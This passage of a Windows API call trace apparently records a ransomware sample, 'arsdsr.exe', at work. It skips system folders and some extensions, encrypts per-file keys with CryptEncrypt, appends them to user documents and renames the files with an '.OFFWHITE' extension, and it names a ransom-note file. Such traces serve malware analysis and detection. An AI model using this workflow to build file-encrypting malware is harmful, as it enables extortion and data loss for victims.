ftCreationTime.dwLowDateTime=0xf3ad4260, ftCreationTime.dwHighDateTime=0x1d5e7b6, ftLastAccessTime.dwLowDateTime=0xaf8396e0, ftLastAccessTime.dwHighDateTime=0x1d5dfbc, ftLastWriteTime.dwLowDateTime=0xaf8396e0, ftLastWriteTime.dwHighDateTime=0x1d5dfbc, nFileSizeHigh=0x0, nFileSizeLow=0x2bdb, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="usv8d-WwNuJ.odt", cAlternateFileName="USV8D-~1.ODT")) returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2=".") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="..") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="...") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="windows") returned -1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="$recycle.bin") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="rsa") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="ntuser.dat") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="programdata") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="appdata") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="program files") returned 1 [0133.318] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="program files (x86)") returned 1 [0133.319] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\" [0133.319] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\", lpString2="usv8d-WwNuJ.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt" [0133.319] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.319] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.319] PathFindExtensionW (pszPath="usv8d-WwNuJ.odt") returned=".odt" [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".log") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".cab") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".cmd") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".com") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".cpl") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".url") returned -1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".ttf") returned -1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".mp3") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".pif") returned -1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".mp4") returned 1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".OFFWHITE") returned -1 [0133.319] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0133.319] lstrcmpiW (lpString1="usv8d-WwNuJ.odt", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0133.319] GetProcessHeap () returned 0x500000 [0133.319] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f758 [0133.319] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\usv8d-wwnuj.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0133.322] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=11227) returned 1 [0133.322] GetProcessHeap () returned 0x500000 [0133.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.322] GetProcessHeap () returned 0x500000 [0133.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.322] GetProcessHeap () returned 0x500000 [0133.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.322] GetProcessHeap () returned 0x500000 [0133.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.323] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.323] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.323] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.323] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.323] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.323] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.323] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.323] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.323] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0133.323] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.323] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.323] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0133.324] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2bdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.324] SetLastError (dwErrCode=0x0) [0133.324] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.329] GetLastError () returned 0x0 [0133.329] GetLastError () returned 0x0 [0133.329] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2cdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.329] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0133.329] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2ddb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.330] WriteFile (in: hFile=0x21c, lpBuffer=0x53f758*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f758*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0133.330] GetProcessHeap () returned 0x500000 [0133.330] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2bdb) returned 0x55a7b8 [0133.330] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.330] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x2bdb, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x2bdb, lpOverlapped=0x0) returned 1 [0133.331] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.331] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x2bdb, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x2bdb, lpOverlapped=0x0) returned 1 [0133.331] GetProcessHeap () returned 0x500000 [0133.331] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.331] CloseHandle (hObject=0x21c) returned 1 [0133.332] GetProcessHeap () returned 0x500000 [0133.333] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.333] GetProcessHeap () returned 0x500000 [0133.333] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.333] GetProcessHeap () returned 0x500000 [0133.333] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.333] GetProcessHeap () returned 0x500000 [0133.333] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.333] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt" [0133.333] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt.OFFWHITE" [0133.333] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\usv8d-wwnuj.odt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cDV0nF7Jj Uo2i92U\\usv8d-WwNuJ.odt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cdv0nf7jj uo2i92u\\usv8d-wwnuj.odt.offwhite")) returned 1 [0133.334] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3ad4260, ftCreationTime.dwHighDateTime=0x1d5e7b6, ftLastAccessTime.dwLowDateTime=0xaf8396e0, ftLastAccessTime.dwHighDateTime=0x1d5dfbc, ftLastWriteTime.dwLowDateTime=0xaf8396e0, ftLastWriteTime.dwHighDateTime=0x1d5dfbc, nFileSizeHigh=0x0, nFileSizeLow=0x2bdb, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="usv8d-WwNuJ.odt", cAlternateFileName="USV8D-~1.ODT")) returned 0 [0133.334] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0133.334] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0133.334] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0133.335] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0133.335] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0133.335] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0133.335] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0133.335] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.335] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" [0133.335] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.335] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.335] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0133.335] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0133.335] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71106330, ftCreationTime.dwHighDateTime=0x1d577ab, ftLastAccessTime.dwLowDateTime=0x487b1bd0, ftLastAccessTime.dwHighDateTime=0x1d5e782, ftLastWriteTime.dwLowDateTime=0x487b1bd0, ftLastWriteTime.dwHighDateTime=0x1d5e782, nFileSizeHigh=0x0, nFileSizeLow=0x1ede, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="gnFu0xP-R5e.pptx", cAlternateFileName="GNFU0X~1.PPT")) returned 1 [0133.335] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2=".") returned 1 [0133.335] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="..") returned 1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="...") returned 1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="windows") returned -1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="$recycle.bin") returned 1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="rsa") returned -1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="ntuser.dat") returned -1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="programdata") returned -1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="appdata") returned 1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="program files") returned -1 [0133.336] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="program files (x86)") returned -1 [0133.336] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.336] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="gnFu0xP-R5e.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx" [0133.336] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.336] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.336] PathFindExtensionW (pszPath="gnFu0xP-R5e.pptx") returned=".pptx" [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0133.336] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0133.337] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0133.337] lstrcmpiW (lpString1="gnFu0xP-R5e.pptx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.337] GetProcessHeap () returned 0x500000 [0133.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f768 [0133.337] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gnfu0xp-r5e.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.338] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=7902) returned 1 [0133.338] GetProcessHeap () returned 0x500000 [0133.338] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.338] GetProcessHeap () returned 0x500000 [0133.338] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.338] GetProcessHeap () returned 0x500000 [0133.338] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.338] GetProcessHeap () returned 0x500000 [0133.338] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.338] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.338] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.338] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.338] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.338] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.338] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.338] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.338] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.338] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.339] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.339] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.339] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.339] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.339] SetLastError (dwErrCode=0x0) [0133.339] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.341] GetLastError () returned 0x0 [0133.341] GetLastError () returned 0x0 [0133.341] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1fde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.341] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.342] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x20de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.342] WriteFile (in: hFile=0xb0, lpBuffer=0x53f768*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f768*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.342] GetProcessHeap () returned 0x500000 [0133.342] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1ede) returned 0x55a7b8 [0133.342] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.342] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1ede, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x1ede, lpOverlapped=0x0) returned 1 [0133.344] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.344] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1ede, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x1ede, lpOverlapped=0x0) returned 1 [0133.344] GetProcessHeap () returned 0x500000 [0133.344] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.344] CloseHandle (hObject=0xb0) returned 1 [0133.348] GetProcessHeap () returned 0x500000 [0133.349] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.349] GetProcessHeap () returned 0x500000 [0133.349] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.349] GetProcessHeap () returned 0x500000 [0133.349] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.349] GetProcessHeap () returned 0x500000 [0133.349] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.349] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx" [0133.349] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx.OFFWHITE" [0133.349] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gnfu0xp-r5e.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gnFu0xP-R5e.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gnfu0xp-r5e.pptx.offwhite")) returned 1 [0133.350] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c5da90, ftCreationTime.dwHighDateTime=0x1d5e676, ftLastAccessTime.dwLowDateTime=0x25deac0, ftLastAccessTime.dwHighDateTime=0x1d5e7f9, ftLastWriteTime.dwLowDateTime=0x25deac0, ftLastWriteTime.dwHighDateTime=0x1d5e7f9, nFileSizeHigh=0x0, nFileSizeLow=0xd689, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="hXl6FO224kZ4lZ dB.xls", cAlternateFileName="HXL6FO~1.XLS")) returned 1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2=".") returned 1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="..") returned 1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="...") returned 1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="windows") returned -1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="$recycle.bin") returned 1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="rsa") returned -1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="ntuser.dat") returned -1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="programdata") returned -1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="appdata") returned 1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="program files") returned -1 [0133.350] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="program files (x86)") returned -1 [0133.350] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS 